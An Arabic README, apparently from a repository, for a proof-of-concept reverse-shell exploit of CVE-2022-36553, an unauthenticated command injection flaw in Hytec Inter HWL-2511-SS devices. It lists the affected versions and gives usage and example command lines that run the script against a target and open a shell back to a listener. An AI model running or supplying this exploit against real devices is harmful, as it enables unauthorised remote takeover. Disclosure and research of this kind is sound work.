
نص برمجي (PoC) لـ CVE-2022-36553: يستغل ثغرة حقن أوامر عن بُعد غير مصادق عليها في جهاز Hytec Inter HWL-2511-SS.
يحتوي هذا المستودع على برنامج نصي لإثبات المفهوم (PoC) لشيل عكسي لاستغلال CVE-2022-36553، وهي ثغرة أمنية حرجة في أجهزة Hytec Inter HWL-2511-SS. يُعد البرنامج النصي عرضًا عمليًا، مكملاً للتحليل المتعمق المقدم في منشور مدونتي "تقرير الثغرة الأمنية في Hytec Inter HWL-2511-SS".
جميع أجهزة Hytec Inter HWL-2511-SS من الإصدار 1.05 وما دونه.
# Usage: python HWL-2511-SS.py --RHOST <Target-IP> --RPORT <Target-Port> --LHOST <Local-IP> --LPORT <Local-Port>
# Example: python HWL-2511-SS.py --RHOST 192.168.1.1 --RPORT 443 --LHOST 192.168.1.100 --LPORT 4444

لأغراض تعليمية فقط.